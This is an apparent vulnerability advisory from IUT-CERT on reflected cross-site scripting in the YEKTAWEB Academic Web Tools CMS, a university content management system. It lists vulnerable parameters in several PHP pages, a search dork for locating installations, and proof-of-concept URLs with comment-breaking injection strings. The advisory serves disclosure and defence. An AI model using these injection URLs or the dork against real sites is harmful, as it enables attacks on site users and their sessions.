|
============================================ IUT-CERT =============================================0D
=0D
Title: Academic Web Tools CMS Multiple XSS=0D
Vendor: www.yektaweb.com=0D
Vulnerable Version: 1.5.7 and priors=0D
Type: XSS=0D
Fix: N/A=0D
Dork: AWT YEKTA=0D
=0D
============================================ nsec.ir =============================================0D
=0D
Description:=0D
------------------=0D
=0D
YEKTAWEB Academic Web Tools is a Persian Content Management System (CMS) for managing university=0D
affairs such as conferences, journals and etc.=0D
The built-in filter of this package can not prevent XSS attack on some parameters.=0D
=0D
=0D
=0D
Vulnerabilities:=0D
------------------=0D
=0D
1- Cross Site Scripting (XSS) in "/page.php" in "sid","logincase" and "redirect" parameters.=0D
http://yoursite/page.php?sid=[XSS]=0D
http://yoursite/page.php?logincase=[XSS]=0D
http://yoursite/page.php?redirect=[XSS]=0D
=0D
2- Cross Site Scripting (XSS) in "/page_arch.php" in "sid","logincase" and "redirect" parameters.=0D
http://yoursite/page_arch.php?sid=[XSS]=0D
http://yoursite/page_arch.php?logincase=[XSS]=0D
http://yoursite/page_arch.php?redirect=[XSS]=0D
=0D
=0D
3- Cross Site Scripting (XSS) in "/login.php" in "sid" ,"logincase" and "redirect" parameters.=0D
http://yoursite/login.php?sid=[XSS]=0D
http://yoursite/login.php?logincase=[XSS]=0D
http://yoursite/login.php?redirect=[XSS]=0D
=0D
4- Cross Site Scripting (XSS) in "/download.php" in "sid" ,"logincase" and "redirect" parameters.=0D
http://yoursite/login.php?sid=[XSS]=0D
http://yoursite/login.php?logincase=[XSS]=0D
http://yoursite/login.php?redirect=[XSS]=0D
=0D
=0D
Exploit/PoC:=0D
------------------=0D
=0D
=0D
Example: =0D
http://yoursite/login.php?slct_pg_id=53&sid=1*/-->&slc_lang=fa=0D
http://yoursite/page_arch.php?slc_lang=fa&sid=1&logincase=*/-->=0D
http://yoursite/page.php?sid=1&slc_lang=en&redirect=*/-->=0D
=0D
=0D
Solution:=0D
------------------=0D
=0D
Input Validation Filter should be patched.=0D
=0D
=0D
Credit: =0D
------------------=0D
Isfahan University of Technology - Computer Emergency Response Team=0D
Thanks to : M. R. Faghani, N. Fathi, E. Aerabi, E. Jafari=0D
=0D
=0D
=0D